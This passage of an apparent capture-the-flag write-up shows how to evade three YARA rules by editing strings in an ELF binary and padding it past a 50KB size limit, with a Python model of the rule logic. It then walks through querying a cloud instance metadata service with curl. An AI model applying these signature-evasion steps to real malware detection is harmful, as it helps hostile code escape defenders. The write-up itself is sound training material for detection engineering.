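Before moving on to rule 1732 (its text is on the next slide), here is an added Python model, not code from the report or the challenge, of the three rules' conditions evaluated against a constructed ELF-like byte string; the 18 rule 1732 strings the report elides are constructed stand-ins. Replaying the report's three edits shows which clause each one turns off, which is the detection-engineering point: a rule that hinges on one mutable string or on a filesize bound is brittle.

```python
import struct

KB = 1024

def is_elf64_magic(data):
    """Mirror of rule 1732's `uint32(1) == 0x02464c45`: bytes 1..4 of an ELF64
    file ('E', 'L', 'F', 0x02) read as a little-endian 32-bit integer."""
    return len(data) >= 5 and struct.unpack_from("<I", data, 1)[0] == 0x02464c45

def rule_135(data):
    """condition: $s -> the single string "candycane" is present."""
    return b"candycane" in data

def rule_1056(data):
    """condition: all of them -> both hex strings, decoded to their ASCII bytes."""
    return b"libc.so.6" in data and b"rogram!!" in data

def rule_1732(data, strings, min_hits=10, max_size=50 * KB):
    """condition: uint32(1) == 0x02464c45 and filesize < 50KB and 10 of them."""
    hits = sum(1 for s in strings if s in data)
    return is_elf64_magic(data) and len(data) < max_size and hits >= min_hits

# Only $s1 and $s20 of rule 1732 are visible in the report; the other 18 are
# constructed stand-ins so that "10 of them" can be evaluated.
RULE_1732_STRINGS = [b"This is critical for the execution of this program!!",
                     b"__libc_csu_init"] + [b"stand_in_%d" % i for i in range(18)]

def evaluate(data):
    return {"yara_rule_135": rule_135(data),
            "yara_rule_1056": rule_1056(data),
            "yara_rule_1732": rule_1732(data, RULE_1732_STRINGS)}

def build_sample():
    """Constructed stand-in for the_critical_elf_app: an ELF64 identification
    prefix followed by the strings the three rules look for ($s1 ends in 'program!!')."""
    body = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"candycane\x00libc.so.6\x00"
    return body + b"\x00".join(RULE_1732_STRINGS) + b"\x00"

def apply_report_edits(data):
    """The report's three edits in order; returns the rule states after each,
    showing which clause of which rule every edit switches off."""
    states = []
    data = data.replace(b"candycane", b"candycame")   # byte edit via vim + xxd
    states.append(evaluate(data))
    data = data.replace(b"program!!", b"program#!")  # 0x21 -> 0x23 on the first '!'
    states.append(evaluate(data))
    data += b"\x00" * 52224                           # the report appends 52224 bytes
    states.append(evaluate(data))
    return states
```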
rule yara_rule_1732
{
    meta:
        description = "binaries - alwayz_winter.exe"
        author = "Santa"
        reference = "North Pole Malware Research Lab"
        date = "1955-04-22"
        hash = "c1e31a539898aab18f483d9e7b3c698ea45799e78bddc919a7dbebb1b40193a8"
    strings:
        $s1 = "This is critical for the execution of this program!!" fullword ascii
        ...
        $s20 = "__libc_csu_init" fullword ascii
    condition:
        uint32(1) == 0x02464c45 and filesize < 50KB and 10 of them
}

There are 20 strings listed in this rule, most of them critical to the function of the program, so they cannot be changed. At least 10 of the strings have to match for this rule to fire, but the file size must also be under 50KB. Let's see if we can inflate the size of this file past 50KB and bypass the rule:

head -c 52224 /dev/random >> ./the_critical_elf_app

Now we can run the app and bypass the final yara rule. We are awarded the Yara Analysis achievement.

3.8 IMDS Exploration

The IMDS Exploration terminal is in Jack Frost's bathroom, and solving it is required to get hints for Objective 10 from Noxious O. D'or. This terminal is a walkthrough that requires you to complete all of its steps, so no hints for the terminal are given. The steps to solve this challenge are listed below.

🎄🎄🎄 Prof. Petabyte here. In this lesson you'll continue to build your cloud asset skills, 🎄🎄🎄
🎄🎄🎄 interacting with the Instance Metadata Service (IMDS) using curl. 🎄🎄🎄
🎄🎄🎄 🎄🎄🎄
🎄🎄🎄 If you get stuck, run 'hint' for assitance. 🎄🎄🎄

Are you ready to begin? [Y]es: Y

The Instance Metadata Service (IMDS) is a virtual server for cloud assets at the IP address 169.254.169.254. Send a couple ping packets to the server.

elfu@ef2c3d6109b8:~$ ping 169.254.169.254 -c 2
PING 169.254.169.254 (169.254.169.254) 56(84) bytes of data.
64 bytes from 169.254.169.254: icmp_seq=1 ttl=64 time=0.017 ms
64 bytes from 169.254.169.254: icmp_seq=2 ttl=64 time=0.037 ms

--- 169.254.169.254 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1010ms
rtt min/avg/max/mdev = 0.017/0.027/0.037/0.010 ms

IMDS provides information about currently running virtual machine instances. You can use it to manage and configure cloud nodes. IMDS is used by all major cloud providers.
Run 'next' to continue.

elfu@ef2c3d6109b8:~$ next
Developers can automate actions using IMDS. We'll interact with the server using the cURL tool.
Run 'curl http://169.254.169.254' to access IMDS data.

elfu@ef2c3d6109b8:~$ curl http://169.254.169.254
latest
Different providers will have different formats for IMDS data. We're using an AWS-compatible IMDS server that returns 'latest' as the default response.
Access the 'latest' endpoint. Run 'curl http://169.254.169.254/latest'

elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest
dynamic
meta-data

IMDS returns two new endpoints: dynamic and meta-data. Let's start with the dynamic endpoint, which provides information about the instance itself.
Repeat the request to access the dynamic endpoint: 'curl http://169.254.169.254/latest/dynamic'.

elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest/dynamic
fws/instance-monitoring
instance-identity/document
instance-identity/pkcs7
instance-identity/signature

Much of the data retrieved from IMDS will be returned in JavaScript Object Notation (JSON) format. Piping the output to 'jq' will make the content easier to read.
Re-run the previous command, sending the output to JQ: 'curl http://169.254.169.254/latest/dynamic/instance-identity/document | jq'

elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest/dynamic/instance-identity/document | jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   451  100   451    0     0   440k      0 --:--:-- --:--:-- --:--:--  440k
{
  "accountId": "PCRVQVHN4S0L4V2TE",
  "imageId": "ami-0b69ea66ff7391e80",
  "availabilityZone": "np-north-1f",
  "ramdiskId": null,
  "kernelId": null,
  "devpayProductCodes": null,
  "marketplaceProductCodes": null,
  "version": "2017-09-30",
  "privateIp": "10.0.7.10",
  "billingProducts": null,
  "instanceId": "i-1234567890abcdef0",
  "pendingTime": "2021-12-01T07:02:24Z",
  "architecture": "x86_64",
  "instanceType": "m4.xlarge",
  "region": "np-north-1"
}

The instance identity document can be used by developers to understand the instance details.
Repeat the request, this time requesting the instance-identity/document resource: 'curl http://169.254.169.254/latest/dynamic/instance-identity/document'.

elfu@ef2c3d6109b8:~$ curl http://169.254.169.254/latest/dynamic/instance-identity/document
{
  "accountId": "PCRVQVHN4S0L4V2TE",
  "imageId": "ami-0b69ea66ff7391e80",
  "availabilityZone": "np-north-1f",
  "ramdiskId": null,
  "kernelId": null,
  "devpayProductCodes": null,
  "marketplaceProductCodes": null,
  "version": "2017-09-30",
  "privateIp": "10.0.7.10",
  "billingProducts": null,
  "instanceId": "i-1234567890abcdef0",
  "pendingTime": "2021-12-01T07:02:24Z",
  "architecture": "x86_64",
  "instanceType": "m4.xlarge",
  "region": "np-north-1"
}
elfu@ef2c3d6109b8:~$